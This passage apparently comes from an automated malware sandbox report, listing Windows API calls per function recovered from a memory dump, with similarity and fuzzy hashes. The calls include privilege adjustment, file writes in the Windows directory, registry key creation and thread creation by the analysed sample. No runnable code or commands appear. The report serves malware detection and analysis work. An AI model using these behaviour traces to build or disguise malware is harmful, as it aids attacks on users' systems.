    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false